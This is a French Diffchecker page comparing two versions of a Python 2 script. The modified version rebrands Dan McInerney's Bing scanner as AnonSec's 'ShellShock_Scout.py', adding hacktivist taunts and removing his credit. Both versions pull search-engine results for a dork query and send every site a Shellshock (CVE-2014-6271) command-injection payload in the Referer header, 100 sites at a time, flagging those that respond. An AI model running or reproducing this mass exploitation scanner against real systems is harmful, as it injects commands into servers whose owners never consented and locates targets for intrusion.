Comparer le texte

Trouver la différence entre deux fichiers texte

Éditeur live

Cacher identiques

Sans retour à la ligne

Vue

Niveau de précision

Coloration syntaxique

Diffchecker Desktop La façon la plus sécurisée d'utiliser Diffchecker. Obtenez l'application Diffchecker Desktop : vos diffs ne quittent jamais votre ordinateur !Obtenir Desktop

Untitled diff

Créé il y a 9 ansLe diff n'expire jamais

104 suppressions

Lignes
Total
Supprimé

Caractères
Total
Supprimé

Pour continuer à utiliser cette fonctionnalité, passez à Diffchecker Pro Voir les prix

109 lignes

122 ajouts

Lignes
Total
Ajouté

Caractères
Total
Ajouté

Pour continuer à utiliser cette fonctionnalité, passez à Diffchecker Pro Voir les prix

134 lignes

#!/usr/bin/env python

# We are...

#This must be one of the first imports or else we get threading error on completion

# _____ _________

# / _ \ ____ ____ ____ / _____/ ____ ____

# / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\

# / | \ | ( <_> ) | \/ \ ___/\ \___

# \____|__ /___| /\____/|___| /_______ /\___ >\___ >

# \/ \/ \/ \/ \/ \/

# //Laughing at your security since 2012*

# ================================================================================================

# Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r

# - Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64

# ================================================================================================

# We are Anonsec

# Beware of our Cyber-Mafia

# We do not Forgive

# We do not Forget

# Expect Us

print "###########################################################"

print "### ShellShock_Scout.py ###"

print "### Mass Bing ShellShock Dork Scanner ###"

print "### CVE-2014-6271 ###"

print "### *************************************************** ###"

print "### \!/Anonsec\!/ ###"

print "### Laughing at your security since 2012* ###"

print "### ###"

print "### _.-''|''-._ ###"

print "### .-' | `-. ###"

print "### .'\ | /`. ###"

print "### .' \ | / `. ###"

print "### \ \ | / / ###"

print "### `\ \ | / /' ###"

print "### _.-`\ \ | / /'-._ ###"

print "### ~~(8:> {_____`\\|//'______} ~~(8:> ###"

print "### `-' ###"

print "### twitter.com/_d3f4ult ###"

print "###########################################################"

from gevent import monkey

monkey.patch_all()

from gevent.pool import Pool

from gevent import joinall

import urllib

import urllib2

import argparse

import sys

import json

import socket

socket.setdefaulttimeout(60)

__author__ = 'Dan McInerney'

__site__ = 'danmcinerney.org'

__twitter__ = '@danhmcinerney'

VULN_FOUND = None

def parse_args():

''' Create the arguments '''

#Create the arguments

parser = argparse.ArgumentParser()

parser.add_argument("-s", "--search", help="Search terms")

parser.add_argument("-p", "--pages", default="1", help="Number of pages of results to fetch where there's 50 results per page; defaults to 1")

parser.add_argument("-k", "--key", help="Your Bing API key found at https://datamarket.azure.com/account")

return parser.parse_args()

def bing_search(query, key, offset, **kwargs):

''' Make the search '''

#Make the search

username = ''

baseURL = 'https://api.datamarket.azure.com/Bing/Search/'

query = urllib.quote(query)

user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)'

credentials = (':%s' % key).encode('base64')[:-1]

auth = 'Basic %s' % credentials

url = baseURL+'Web?Query=%27'+query+'%27&$top=50&$format=json&$skip='+offset

print '[*] Fetching '+url

print '[*] Scanning -> '+url

password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()

password_mgr.add_password(None, url, username, key)

handler = urllib2.HTTPBasicAuthHandler(password_mgr)

opener = urllib2.build_opener(handler)

urllib2.install_opener(opener)

try:

readURL = urllib2.urlopen(url, timeout=60).read()

except Exception as e:

sys.exit('[-] Failed to fetch bing results. Are you sure you have the right API key?\n Error: '+str(e))

return readURL

def action(result):

''' Make the payloaded request and check the response's headers for the echo msg'''

#Make the payloaded request and check the response's headers for the echo msg

global VULN_FOUND

exploit = "() { :;}; echo 'Shellshock: Vulnerable'"

ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'

url = result['Url']

req = urllib2.Request(url)

req.add_header('User-Agent', ua)

req.add_header('Referer', exploit)

try:

r = urllib2.urlopen(req, timeout=60)

except Exception as e:

return

resp_headers = r.info()

if 'shellshock' in r.info():

VULN_FOUND = True

print '[!] SHELLSHOCK VULNERABLE:', url

return

def result_concurrency(results):

''' Open all the greenlet threads '''

#Open all the greenlet threads

in_parallel = 100

pool = Pool(in_parallel)

jobs = [pool.spawn(action, result) for result in results]

return joinall(jobs)

def main():

args = parse_args()

if not args.search:

sys.exit('[!] Specify a search term, eg, ./search-bing.py -s "search for this"')

sys.exit('[!] Specify a search term, eg, ./shellshock_scout.py -s "dorks"')

if not args.key:

sys.exit('[!] Specify a Bing API key or get one here: https://datamarket.azure.com/dataset/bing/search')

key = args.key

if len(key) not in (44, 43):

sys.exit('[-] Incorrect key length')

query = args.search

pages = int(args.pages)

offset = 0

total_results = []

for x in xrange(pages):

# Start off with offset = 0

if x != 0:

offset += 50

response = bing_search(query, key, str(offset))

results = json.loads(response)['d']['results']

if len(results) == 0:

print '[-] No more results found'

break

total_results += results

print '[*] Checking each search result...'

result_concurrency(total_results)

if not VULN_FOUND:

print '[-] No vulnerable sites found'

if __name__ == "__main__":

main()

Différences enregistrées

Texte d'origine

Ouvrir un fichier

#!/usr/bin/env python

#This must be one of the first imports or else we get threading error on completion
from gevent import monkey
monkey.patch_all()
from gevent.pool import Pool
from gevent import joinall

import urllib
import urllib2
import argparse
import sys
import json
import socket
socket.setdefaulttimeout(60)

__author__ = 'Dan McInerney'
__site__ = 'danmcinerney.org'
__twitter__ = '@danhmcinerney'

VULN_FOUND = None

def parse_args():
   ''' Create the arguments '''
   parser = argparse.ArgumentParser()
   parser.add_argument("-s", "--search", help="Search terms")
   parser.add_argument("-p", "--pages", default="1", help="Number of pages of results to fetch where there's 50 results per page; defaults to 1")
   parser.add_argument("-k", "--key", help="Your Bing API key found at https://datamarket.azure.com/account")
   return parser.parse_args()

def bing_search(query, key, offset, **kwargs):
    ''' Make the search '''
    username = ''
    baseURL = 'https://api.datamarket.azure.com/Bing/Search/'
    query = urllib.quote(query)
    user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)'
    credentials = (':%s' % key).encode('base64')[:-1]
    auth = 'Basic %s' % credentials
    url = baseURL+'Web?Query=%27'+query+'%27&$top=50&$format=json&$skip='+offset
    print '[*] Fetching '+url
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    password_mgr.add_password(None, url, username, key)
    handler = urllib2.HTTPBasicAuthHandler(password_mgr)
    opener = urllib2.build_opener(handler)
    urllib2.install_opener(opener)
    try:
        readURL = urllib2.urlopen(url, timeout=60).read()
    except Exception as e:
        sys.exit('[-] Failed to fetch bing results. Are you sure you have the right API key?\n      Error: '+str(e))
    return readURL

def action(result):
    ''' Make the payloaded request and check the response's headers for the echo msg'''
    global VULN_FOUND
    exploit = "() { :;}; echo 'Shellshock: Vulnerable'"
    ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'
    url = result['Url']

req = urllib2.Request(url)
    req.add_header('User-Agent', ua)
    req.add_header('Referer', exploit)
    try:
        r = urllib2.urlopen(req, timeout=60)
    except Exception as e:
        return
    resp_headers = r.info()
    if 'shellshock' in r.info():
        VULN_FOUND = True
        print '[!] SHELLSHOCK VULNERABLE:', url
    return

def result_concurrency(results):
    ''' Open all the greenlet threads '''
    in_parallel = 100
    pool = Pool(in_parallel)
    jobs = [pool.spawn(action, result) for result in results]
    return joinall(jobs)

def main():
    args = parse_args()
    if not args.search:
        sys.exit('[!] Specify a search term, eg, ./search-bing.py -s "search for this"')
    if not args.key:
        sys.exit('[!] Specify a Bing API key or get one here: https://datamarket.azure.com/dataset/bing/search')
    key = args.key
    if len(key) not in (44, 43):
        sys.exit('[-] Incorrect key length')
    query = args.search
    pages = int(args.pages)
    offset = 0
    total_results = []
    for x in xrange(pages):
        # Start off with offset = 0
        if x != 0:
            offset += 50
        response = bing_search(query, key, str(offset))
        results = json.loads(response)['d']['results']
        if len(results) == 0:
            print '[-] No more results found'
            break
        total_results += results
    print '[*] Checking each search result...'
    result_concurrency(total_results)
    if not VULN_FOUND:
        print '[-] No vulnerable sites found'

if __name__ == "__main__":
    main()

Texte modifié

Ouvrir un fichier

#!/usr/bin/env python
# We are...
#                     _____                         _________              
#                    /  _  \   ____   ____   ____  /   _____/ ____   ____  
#                   /  /_\  \ /    \ /  _ \ /    \ \_____  \_/ __ \_/ ___\
#                  /    |    \   |  (  <_> )   |  \/        \  ___/\  \___
#                  \____|__  /___|  /\____/|___|  /_______  /\___  >\___  >
#                          \/     \/            \/        \/     \/     \/
#                                   //Laughing at your security since 2012*
# ================================================================================================
# Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - 4prili666h05t - Hannaichi - ap3x h4x0r 
#                         - Gh05tFr3ak - xCyb3r 3vil7 -  Hassouna Khalil - spider64
# ================================================================================================
#
#
# We are Anonsec
# Beware of our Cyber-Mafia
# We do not Forgive
# We do not Forget
# Expect Us 
#
print "###########################################################"
print "###                ShellShock_Scout.py                  ###"      
print "###          Mass Bing ShellShock Dork Scanner          ###"
print "###                   CVE-2014-6271                     ###"
print "### *************************************************** ###"
print "###                   \!/Anonsec\!/                     ###"
print "###        Laughing at your security since 2012*        ###"                      
print "###                                                     ###"
print "###                    _.-''|''-._                      ###"
print "###                 .-'     |     `-.                   ###"
print "###               .'\       |       /`.                 ###"
print "###             .'   \      |      /   `.               ###"
print "###             \     \     |     /     /               ###"
print "###              `\    \    |    /    /'                ###"
print "###                `\   \   |   /   /'                  ###"
print "###                  `\  \  |  /  /'                    ###"
print "###                 _.-`\ \ | / /'-._                   ###"
print "###    ~~(8:>      {_____`\\|//'______}  ~~(8:>          ###"
print "###                        `-'                          ###"
print "### twitter.com/_d3f4ult                                ###"
print "###########################################################"
from gevent import monkey
monkey.patch_all()
from gevent.pool import Pool
from gevent import joinall
import urllib
import urllib2
import argparse
import sys
import json
import socket
socket.setdefaulttimeout(60)
VULN_FOUND = None
def parse_args():
#Create the arguments
	parser = argparse.ArgumentParser()
	parser.add_argument("-s", "--search", help="Search terms")
	parser.add_argument("-p", "--pages", default="1", help="Number of pages of results to fetch where there's 50 results per page; defaults to 1")
	parser.add_argument("-k", "--key", help="Your Bing API key found at https://datamarket.azure.com/account")
	return parser.parse_args()
def bing_search(query, key, offset, **kwargs):
#Make the search
	username = ''
	baseURL = 'https://api.datamarket.azure.com/Bing/Search/'
	query = urllib.quote(query)
	user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)'
	credentials = (':%s' % key).encode('base64')[:-1]
	auth = 'Basic %s' % credentials
	url = baseURL+'Web?Query=%27'+query+'%27&$top=50&$format=json&$skip='+offset
	print '[*] Scanning -> '+url
	password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
	password_mgr.add_password(None, url, username, key)
	handler = urllib2.HTTPBasicAuthHandler(password_mgr)
	opener = urllib2.build_opener(handler)
	urllib2.install_opener(opener)
	try:
		readURL = urllib2.urlopen(url, timeout=60).read()
	except Exception as e:
		sys.exit('[-] Failed to fetch bing results. Are you sure you have the right API key?\n Error: '+str(e))
	return readURL
def action(result):
#Make the payloaded request and check the response's headers for the echo msg
	global VULN_FOUND
	exploit = "() { :;}; echo 'Shellshock: Vulnerable'"
	ua = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'
	url = result['Url']
	req = urllib2.Request(url)
	req.add_header('User-Agent', ua)
	req.add_header('Referer', exploit)
	try:
		r = urllib2.urlopen(req, timeout=60)
	except Exception as e:
		return
	resp_headers = r.info()
	if 'shellshock' in r.info():
		VULN_FOUND = True
		print '[!] SHELLSHOCK VULNERABLE:', url
	return
def result_concurrency(results):
#Open all the greenlet threads
	in_parallel = 100
	pool = Pool(in_parallel)
	jobs = [pool.spawn(action, result) for result in results]
	return joinall(jobs)
def main():
	args = parse_args()
	if not args.search:
		sys.exit('[!] Specify a search term, eg, ./shellshock_scout.py -s "dorks"')
	if not args.key:
		sys.exit('[!] Specify a Bing API key or get one here: https://datamarket.azure.com/dataset/bing/search')
	key = args.key
	if len(key) not in (44, 43):
		sys.exit('[-] Incorrect key length')
	query = args.search
	pages = int(args.pages)
	offset = 0
	total_results = []
	for x in xrange(pages):
		# Start off with offset = 0
		if x != 0:
			offset += 50
		response = bing_search(query, key, str(offset))
		results = json.loads(response)['d']['results']
		if len(results) == 0:
			print '[-] No more results found'
			break
		total_results += results
	print '[*] Checking each search result...'
	result_concurrency(total_results)
	if not VULN_FOUND:
		print '[-] No vulnerable sites found'
if __name__ == "__main__":
	main()